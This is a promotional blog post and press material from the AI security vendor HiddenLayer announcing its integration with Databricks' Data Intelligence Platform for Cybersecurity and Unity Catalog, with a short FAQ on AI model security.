HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its platform helps enterprises safeguard agentic, generative, and predictive AI applications without adding unnecessary complexity or requiring access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer delivers supply chain security, runtime defense, posture management, and automated red teaming.
For more information, visit www.hiddenlayer.com.
Press Contact:
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity
On September 30, Databricks officially launched its Data Intelligence Platform for Cybersecurity, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.
Why Databricks’ Data Intelligence Platform for Cybersecurity Matters for AI Security
Cybersecurity and AI are now inseparable. Modern defenses rely heavily on machine learning models, but that also introduces new attack surfaces. Models can be compromised through adversarial inputs, data poisoning, or theft. These attacks can result in missed fraud detection, compliance failures, and disrupted operations.
Until now, data platforms and security tools have operated mainly in silos, creating complexity and risk.
The Databricks Data Intelligence Platform for Cybersecurity is a unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
How HiddenLayer Secures AI Applications Inside Databricks
HiddenLayer adds the critical layer of security for AI models themselves. Our technology scans and monitors machine learning models for vulnerabilities, detects adversarial manipulation, and ensures models remain trustworthy throughout their lifecycle.
By integrating with Databricks Unity Catalog, we make AI application security seamless, auditable, and compliant with emerging governance requirements. This empowers organizations to demonstrate due diligence while accelerating the safe adoption of AI.
The Future of Secure AI Adoption with Databricks and HiddenLayer
The Databricks Data Intelligence Platform for Cybersecurity marks a turning point in how organizations must approach the intersection of AI, data, and defense. HiddenLayer ensures the AI applications at the heart of these systems remain safe, auditable, and resilient against attack.
As adversaries grow more sophisticated and regulators demand greater transparency, securing AI is an immediate necessity. By embedding HiddenLayer directly into the Databricks ecosystem, enterprises gain the assurance that they can innovate with AI while maintaining trust, compliance, and control.
In short, the future of cybersecurity will not be built solely on data or AI, but on the secure integration of both. Together, Databricks and HiddenLayer are making that future possible.
FAQ: Databricks and HiddenLayer AI Security
What is the Databricks Data Intelligence Platform for Cybersecurity?
The Databricks Data Intelligence Platform for Cybersecurity delivers the only unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
Why is AI application security important?
AI applications and their underlying models can be attacked through adversarial inputs, data poisoning, or theft. Securing models reduces risks of fraud, compliance violations, and operational disruption.
How does HiddenLayer integrate with Databricks?
HiddenLayer integrates with Databricks Unity Catalog to scan models for vulnerabilities, monitor for adversarial manipulation, and ensure compliance with AI governance requirements.
Get all our Latest Research & Insights
Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.


